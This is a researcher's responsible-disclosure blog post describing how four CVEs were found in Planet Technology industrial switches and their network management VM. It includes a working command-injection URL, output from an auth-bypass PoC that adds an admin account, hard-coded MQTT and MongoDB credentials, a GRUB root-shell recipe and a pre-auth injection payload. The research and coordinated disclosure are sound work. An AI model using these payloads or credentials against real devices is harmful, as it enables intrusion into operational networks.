Responsible Disclosures
April 25, 2025

How We Discovered Planet Technology Network Device Vulnerabilities

Contributors
Senior Director Cyber Threat Research
Immersive

I’ve recently been on a hardware bug-hunting kick, picking up new skills and learning or creating new tools with a focus on hardware reverse engineering for IoT and embedded devices (mainly routers, as they’re pretty easy to get hold of). I’ve also spent the last few months looking at operational technology (OT) and industrial control systems (ICSs) to create cyber ranges and training environments. These passions led to an unexpected cybersecurity discovery.

Back in December, I spotted an advisory for a couple of vulnerabilities in a set of industrial network switches from a manufacturer in Taiwan, Planet Technology. There were no technical details at the time of the release, and I had no other active research as we wound into the festive period.

I wanted to see if I could replicate the findings blindly. With just the advisory to go on, would I be able to locate the vulnerabilities, and could I write a proof of concept (POC) to exploit them? 

You can do a lot with emulation these days, but I still prefer to have the physical devices so I can get as close to the real-world behavior as possible. Plus, it opens up some other avenues like universal asynchronous receive and transmit (UART) logging, or grabbing firmware from the device itself if the vendor doesn't have it available or it's encrypted.

It took a few weeks. But, after some delays and some shipping issues, I found myself the owner of two brand-new, in-box Planet Technology switches.

The setup

The setup was pretty simple. My home lab has a separate isolated network with an ESXi server that runs my reverse engineering (RE) environment, Kali, Burp, etc., as well as a few conveniences like a network tap to make sure I can capture all the packets from the physical side – not just the mirror on the switches.

With everything connected to the network and powered up from the bench power supply, I ran the first-time setup to make sure the devices were functional. Then I could start testing.

TL;DR

To shorten what’s already going to be a long post, I was successful in identifying the vulnerabilities from the CISA report. But I also spotted a couple of other vulnerabilities, not just in these switches (and likely other models), but also in the network management tool that’s used to remotely manage whole fleets of Planet devices in organizations.

If you’re looking for a summary of the CVEs and their potential impacts, check out this blog post.

Getting the firmware

Starting with the switches, it was pretty easy to get hold of the firmware, as it’s provided as a download on the vendor's site. For each switch, I grabbed the latest firmware and updated both switches. (The firmware for each switch was practically identical, with only very minor differences.)

Having validated the previous findings, I wanted to ensure that anything new I found wasn’t also patched as part of the other disclosure. Specifically:

  • WGS-80-HPT-V2 = 2.305b250121
  • WGS-4215-8T2S = 1.305b241115

With the firmware loaded and tested, it was time to get into the weeds. Unpacking the zip archive from the vendor’s site, I found a .bix file. BIX is a less common format for packing firmware – thankfully, it’s just GZIP under the hood, so it was pretty easy to extract with a tool like 7-Zip.
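
For reference, confirming and unpacking it takes two commands (the archive filename below is a placeholder for whichever firmware bundle you downloaded):

file firmware.bix   # reports: gzip compressed data
7z x firmware.bix   # or: cp firmware.bix firmware.gz && gunzip firmware.gz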

Unpacking the BIX archive, I got a single file, vmlinux_org.bin. For this one, I turned to binwalk.

Note: Binwalk v3 has been released and is a significant improvement over earlier versions. If you haven’t already updated, I’d make the transition. It’s an easy install via cargo (it’s published on crates.io), and it’s significantly quicker and less prone to false positives.

Binwalk gave two results: a very old Linux kernel and another GZIP-compressed section, which most likely holds the file system.

I ran binwalk again with the -e -M flags to recursively extract and scan the sections. This quickly produced several sets of files.
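
In practice that was just two passes over the image, roughly:

binwalk vmlinux_org.bin        # identify the kernel and the embedded GZIP section
binwalk -e -M vmlinux_org.bin  # extract recursively (matryoshka mode)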

Looking at the extracted file system, there was a lot. It would take a while to review everything manually.

Automating the boring stuff

This is where I like automation. I want to look for low-hanging fruit, and most of the “fun” things are probably going to be in the binary files.

I wrote a Python script to automate a few of the more manual steps (a rough sketch follows the list). It:

  • Scans a given directory for any ELF binaries
  • Creates a Ghidra project
  • Loads each ELF file and runs Ghidra’s default analysis
  • Searches for a set of functions and xrefs
  • If a function and xref is found, the decompiled code is written to a directory
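
As a rough illustration of the wrapper (not the exact script I used): the Ghidra install path, project name, and the find_sinks.py post-script – which would do the function/xref search and dump the decompiled callers – are all placeholders here.

import subprocess
import sys
from pathlib import Path

GHIDRA_HEADLESS = "/opt/ghidra/support/analyzeHeadless"  # adjust to your install
PROJECT_DIR = Path("ghidra_projects")
PROJECT_NAME = "planet_firmware"
POST_SCRIPT = "find_sinks.py"  # placeholder Ghidra script: hunts system()/popen() xrefs and dumps decompiled callers

def is_elf(path: Path) -> bool:
    # Cheap ELF check: the first four bytes are the ELF magic
    try:
        with path.open("rb") as f:
            return f.read(4) == b"\x7fELF"
    except OSError:
        return False

def main(root: str) -> None:
    PROJECT_DIR.mkdir(exist_ok=True)
    elves = [p for p in Path(root).rglob("*") if p.is_file() and is_elf(p)]
    print(f"[+] Found {len(elves)} ELF binaries under {root}")
    for binary in elves:
        # Import the binary, run Ghidra's default analysis, then the sink-hunting post-script
        subprocess.run([
            GHIDRA_HEADLESS, str(PROJECT_DIR), PROJECT_NAME,
            "-import", str(binary),
            "-overwrite",
            "-postScript", POST_SCRIPT,
        ], check=False)

if __name__ == "__main__":
    main(sys.argv[1] if len(sys.argv) > 1 else ".")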

The script found several system calls across a handful of the web CGI files. These were definitely of interest, as it’s possible they could be reached from the web graphical user interface (GUI).

Checking the code directory the script created for me, a couple of these function call results jumped out as immediately interesting.

I needed to review this properly in Ghidra, but at first glance, it looked like a classic command injection vulnerability.

Spoiler! This is the first new vulnerability, CVE-2025-46272, a post-auth command injection vulnerability.

So I had something that looked interesting. From a cursory review of the code, it looked like it should be vulnerable, but I wasn’t yet sure whether any sanitization had happened earlier in the process.

The easiest way to check was to test it dynamically in a tool like Burp. But first, I had to work out where this page lived in the application.

As it turns out, this function wasn’t actually available from the menus in the application. It might have been a leftover tool or maybe a function for another switch that shares the same code base. Either way, the function exists, and I could manually navigate to it.

Without going too deep, the web application uses a cmd value to determine which page to load. In this instance, looking at the code, you can see that the function loads a new page dispatcher.cgi?cmd=%d. You can also see that 0x214 or 532 gets passed to this URL string. This is what I used to find the “hidden page”.

Grabbing the cmd value for this page, I opened it in a browser and got my first look at the trace route page.

Then it was time to load up Burp to see if I could get a command injection here.

Turns out – yes! 

http://172.21.1.100/cgi-bin/dispatcher.cgi?cmd=532&ip_URL=; echo `ps -w`&tr_maxhop_URL=30&
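
For anyone reproducing this, the same request works from the command line once you have an authenticated session; a rough curl equivalent (the cookie name below is a placeholder – grab the real session cookie from your browser or Burp):

curl -s -b "SESSION=<valid session cookie>" \
  "http://172.21.1.100/cgi-bin/dispatcher.cgi?cmd=532&ip_URL=;%20echo%20%60ps%20-w%60&tr_maxhop_URL=30&"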

The accidental auth bypass

I don't even know how I found this one, other than to say dumb luck played a large part in it. 

I’d spent hours across many days reading decompiled C and tracing through functions in Ghidra to see if there were any other critical issues. But I needed to switch my focus – there’s only so long you can stare at Ghidra before madness starts to creep in! That is to say, it’s much better to step back, look at something else, and let your subconscious process things in the background.

So I took to Burp and started looking for logic flaws or bugs in the auth flows and file uploads. Could I abuse these to get a shell on the host or bypass the login flow?

As you probably guessed from this very leading statement, both of these things turned out to be true! This was the second vulnerability, CVE-2025-46275, an auth bypass on WGS switches, which chained quite nicely with the OS command injection vulnerability.

I was in Burp Repeater looking at the uploader for the configuration file. I was tampering with some header fields and accidentally deleted the cookie from the header when I was removing some of the browser-populated values. I sent the POST request, and it was successful.

It was actually the next day when I realised what I had done. After powering everything back up and returning to Burp, I jumped straight into the repeater that I’d left open and just hit send. To my surprise, it just worked!

The session files are stored in /tmp, which gets emptied out on reboot, so this attempt should have redirected me to the login page. But it didn't; it was successful!

First request with the session cookie
Second request with the session cookie removed

There are many vectors here with auth bypass on file upload. I could have flashed custom firmware to take complete control over the device (I might save this one for a later blog post…) or I could have manipulated the configuration to change how the device operates.

For the sake of a clean and impactful PoC, I decided to go with creating a new admin account. 

To simplify this process, I also created a PoC script in Python that automates the process and creates an admin account for you.


┌──(kali㉿kali)-[~/planet]
└─$ python3 planet-auth-bypass.py 172.21.1.100 manager newpassword
[+] Creating a new admin account on the switch
	[-] Username: manager
	[-] Password: newpassword
[+] Sending the request to the switch
[+] Success Your new account exists, you can log in now
	[-] This is the running config and will be lost on reboot
	[-] You can also use SSH

By choosing to write to the running config, my account is ephemeral. If the device is rebooted without first committing the running config to the startup config, the account will disappear without a trace. This is easy to change, and I could commit my new account to the startup config just as easily.

This remote management looks interesting… 

Jumping back into the decompiled C code, another binary stood out to me as interesting. I spotted it in the web user interface as well.

I saw remote NMS configuration and a binary named nms_agent. Digging through the decompiled binary, a few things jumped out pretty quickly:

  • There are two options for remote management: Planet Cloud or a local network management device.
  • The NMS service uses MQTT to send and receive messages.
  • If you’re using a local network management device, the MQTT defaults to client:client as the username and password.

Rabbit hole, here we come!

To test this, I really needed a local NMS. But they aren’t cheap or quick to get hold of, and I couldn’t justify buying one on a “what if”. Fortunately, the answer came in the form of a virtual machine.

As I was browsing the planet.com.tw site, I came across the UNI-NMS-LITE, a virtual machine with a software-based NMS that, by all appearances, operated the same way as the hardware devices, just with a limited set of features.

This was pretty easy to deploy to the ESXi server in the range and get up and running.

You guessed it! This was the third vulnerability, CVE-2025-46273, hard-coded credentials for the NMS and connected clients.

Mosquitto

With a local NMS connected to the network and each of the switches configured and communicating, it was time to see what I could do with those hard-coded credentials.

My go-to tool for quickly reviewing MQTT servers is MQTT Explorer. It’s cross-platform and pretty easy to configure.

Normally, when using a protocol like MQTT, you need to subscribe to specific topics to see what traffic is being sent. Fortunately for me, MQTT Explorer subscribes to everything by default using the wildcard topic, meaning every time a device communicates with the MQTT server or the NMS server sends a command to a managed device, we also get a copy of the data.
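
The same passive sniffing can be scripted; here’s a minimal sketch using paho-mqtt (assuming the 1.x callback API), with the broker IP being the UNI-NMS-LITE VM in my lab – swap in your own address:

import paho.mqtt.client as mqtt  # assumes paho-mqtt 1.x

BROKER = "172.21.1.200"  # placeholder: the NMS VM in my lab
PORT = 1883              # default MQTT port

def on_connect(client, userdata, flags, rc):
    print(f"[+] Connected (rc={rc}), subscribing to every topic")
    client.subscribe("#")  # wildcard subscription – see everything the broker relays

def on_message(client, userdata, msg):
    print(f"{msg.topic}: {msg.payload[:200]!r}")

client = mqtt.Client()
client.username_pw_set("client", "client")  # the hard-coded defaults (CVE-2025-46273)
client.on_connect = on_connect
client.on_message = on_message
client.connect(BROKER, PORT, keepalive=60)
client.loop_forever()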

The impact of this vulnerability depends on the types of devices being managed and their capabilities. At best, this is an information gold mine for threat actors, discovering all the assets and their configurations. At worst, attackers can publish messages to devices that will override their configuration.

Following the lead

Having gained access to the MQTT server, I was now interested in what other issues might be affecting the NMS server. Running a quick nmap scan to see what was open and listening, I found the MQTT port as expected, but I also found MongoDB listening.
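
Nothing fancy on the scanning side; it was roughly this (the IP is my lab’s NMS VM):

nmap -sV -p- 172.21.1.200   # all TCP ports, with service/version detection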

This was interesting, as the setup process hadn’t asked me to configure any secrets other than the initial account. That suggested that the MongoDB database could be using hard-coded credentials in the same way the MQTT server was, and as it was publicly exposed, that would be bad!

To prove this, I first needed access to the code on the server. I could grab the firmware from the vendor’s website, but they only provide an encrypted copy (and we don’t have the keys… yet!), so I had to get it from the device itself.

I used the credentials in the installation guide, but got a fairly restricted shell.

Please enter your choice:
1) View IP Status      4) Factory Default     7) Shutdown
2) Ping                5) Logout              8) System Information
3) Restart Network     6) Reboot
Please enter your choice: 

While I could have tried to escape this shell, there was actually an easier option. As this is a virtual machine and I had physical access to both the console and the disk images, it was trivial to get a root shell using a well-known Linux recovery technique. 

First, I booted into GRUB, then modified the kernel boot arguments to include init=/bin/bash. This results in the OS booting straight into bash as the root user, bypassing any auth requirements.

From here, I remounted the filesystem as rw (read/write) and edited the /home/adminuser/.bashrc file, which is where our limited command line interface (CLI) was being launched.

As an added bonus, I added a sudo su so I’d get a root shell every time I SSHed in.
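
Condensed into the rough sequence of steps (menu details and paths will vary with the GRUB version on the VM):

# At the GRUB menu: highlight the default entry, press 'e', and append
#   init=/bin/bash
# to the line starting with 'linux', then boot with Ctrl-X.

# You land in a root bash shell with / mounted read-only, so remount it:
mount -o remount,rw /

# Edit the file that launches the restricted CLI for the admin user:
vi /home/adminuser/.bashrc

# Flush changes to disk and force a restart
sync
reboot -f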

As root, I was able to access the web application and everything else that’s running on the NMS, including the encryption keys used to decrypt the firmware upgrade bundle. 

The bulk of the NMS application is written in Python, a language I’m pretty comfortable with, making analysis here a little easier than it was with the compiled C.

I started by looking for the Mongo credentials (opening the web app in an IDE that understands Python also makes this a lot easier), and after a quick search I found the hard-coded credentials!


def connect_db():
    import pymongo
    from pymongo import MongoClient
    # Define MongoClient in pymongo module
    client = MongoClient('mongodb://planet:123456@localhost:27017/controller')
    # Connect to mongodb/controller with user:'planet' and passwd:'123456'
    return client

This was the penultimate vulnerability, CVE-2025-46274, hard-coded Mongo credentials. 

It’s important to note that actually connecting to the Mongo service remotely wasn’t as simple as point and click. The Mongo version running on the NMS is very old (v2.6.10), and any modern Mongo client outright refuses to connect. Installing an older version on a modern Linux system is also pretty painful. You can’t even pull the Docker image for 2.6.10, as its old manifest schema is deprecated and no longer served.
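
One way around it – a sketch rather than the exact route I took – is to pin an older Python driver, since pymongo 3.x still speaks the 2.6 wire protocol and its MONGODB-CR authentication. The host IP here is my lab’s NMS VM:

# pip install "pymongo<4"
from pymongo import MongoClient

# Hard-coded credentials lifted from connect_db() (CVE-2025-46274)
client = MongoClient("mongodb://planet:123456@172.21.1.200:27017/controller")
db = client["controller"]
print(db.collection_names())  # deprecated helper, but works against old servers on pymongo 3.x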

With access to the Mongo database I had full control over the NMS and full access to information on every managed device. This included any configured simple network management protocol (SNMP) secrets and simple mail transfer protocol (SMTP) credentials if notifications are enabled.

Where are the user accounts?

I was now looking at the collections and documents in the Mongo database. While I could find credentials for managing the devices, the credentials for logging in to the NMS itself – the NMS user accounts – weren’t in the Mongo database. Were they being stored somewhere else?

Jumping back into Burp, I sent a login request to see where it was going, so I could then grab the matching file and check the authentication flows.

login.py was easy enough to find in the integrated development environment (IDE); I immediately saw what I was looking for.

The app uses a .htpasswd file to manage authentication – a strange choice given that there’s a database connected to the app – but there is a bigger concern: the way the credentials are validated is open to abuse.


def isValidLogin(username, password):
    if localDebug:
        print(username, password)
    p = subprocess.check_output("grep "+username+" /etc/apache2/.htpasswd | cut -d$ -f3", shell=True).decode()
    if len(p)==0:
        return False #Wrong Username
    salt = p.strip()
    try:
        p = subprocess.check_output("openssl passwd -apr1 -salt "+str(salt)+" "+password.encode().hex(), shell=True).decode()
    except Exception as inst:
        if localDebug:
            print(sys._getframe().f_lineno, str(inst))
        return False
    passwd = p.strip()
    cmd = "grep '"+username+":"+passwd+"' /etc/apache2/.htpasswd -c\n"
    try:
        p = subprocess.check_output(cmd, shell=True).decode()
        if int(p)==0:
            return False
        return True
    except Exception as inst:
        if localDebug:
            print(sys._getframe().f_lineno, str(inst))
        return False


The application uses OS system calls and string concatenation to create the commands and read the response. The worst issue with this approach is that the user's input isn’t sanitized before being passed to the system call.
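
To make that concrete: shell metacharacters in the username flow straight into check_output. A username of, say, x /dev/null; touch /tmp/pwned # turns the first grep into:

grep x /dev/null; touch /tmp/pwned # /etc/apache2/.htpasswd | cut -d$ -f3

The grep fails harmlessly, the touch runs, and the trailing # comments out the rest of the original pipeline – the response just reports a failed login, hence “blind”.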

It's blind command injection, but using Burp to tamper with the request and my SSH access to the host, I could confirm a valid injection.

This was our final finding, CVE-2025-46271, a pre-auth command injection vulnerability. If you can access the login page, you can get a remote shell. You drop in as www-data, a limited account, but there are a number of potential routes that would likely result in gaining root-level permissions.

In the wild

To really know the impact of a vulnerability when a public disclosure is made, you need to understand:

  • How widely the hardware is distributed across the globe
  • Whether the devices are connected to the internet, as this directly translates to exposure

My two go-to tools for this type of search are Shodan.io and Censys.io.

Censys.io has recently released a new version of its portal that makes searching significantly easier. Next, I had to work out how to fingerprint the devices.

I took two approaches here. The first was a bit of a scatter-gun approach that would find likely Planet devices, but wouldn't be able to validate the version (and could pick up other devices).

This first search was for the web path dispatcher.cgi and the server software hydra, which returned around 5,000 results.

A scan showed these were definitely Planet devices – or they at least shared the same URL structure, server software, and HTML title – but from the results, it was difficult to tell what devices they were specifically.

The second search was more specific. Censys allows you to search using the SHA256 of the HTML. This should be pretty effective as the default pages for both switches were static with no dynamically-generated elements like a timestamp. This was an easy search with two steps:

  • Get the SHA of the landing page with curl http://172.21.1.100 | sha256sum
  • Search for the resulting hash

808 results this time round! Again, it was hard to identify specific versions, but these were going to be Planet switches, most likely in the WGS series.

I made a lot of assumptions when reviewing these results, especially using passive tools like Shodan and Censys. With more active recon, it’s possible to fingerprint the specific versions and identify internet-connected devices that would be vulnerable to the CVEs detailed here. But that’s outside the scope of this report.

It all ended with a CISA advisory

By now, it had been a few months since I’d first started down this path, given the festive period, a full-time day job, and that this kind of research was something I do for “fun”. I had to move on to other projects!

I’m a big fan of responsible disclosure, regardless of bug bounty programs. And, given the scope and potential impact of these findings, I wanted to ensure that they were fixed. If I could find them, then threat actors looking to target these sectors could also find them. 

I had no idea how to contact Planet.com.tw, but as this had all started with a CISA advisory, I figured that would be a sensible approach for me to take as well. So I emailed CISA and asked for their help. A couple of days later, I had my response. 

Good afternoon Mr. Breen,

Thank you for reaching out to us, we would be eager to coordinate with you to disclose these vulnerabilities.

We utilize a secure platform called VINCE to coordinate with researchers and vendors.

Thanks to the support from CISA, I was able to contact the team at Planet Technology. They responded really well to the reports and were open to feedback and discussion about the impact of some of the findings.

Here’s a full timeline of the disclosure process. You can find the official CISA advisory here.

February 23, 2025 // Immersive contacts CISA for support with disclosure to Planet Technology

March 6, 2025 // CISA coordinates with Planet Technology and Immersive via VINCE

March 7, 2025 // Vendor confirms findings

April 16, 2025 // Vendor releases patches

April 24, 2025 // CISA publishes advisory
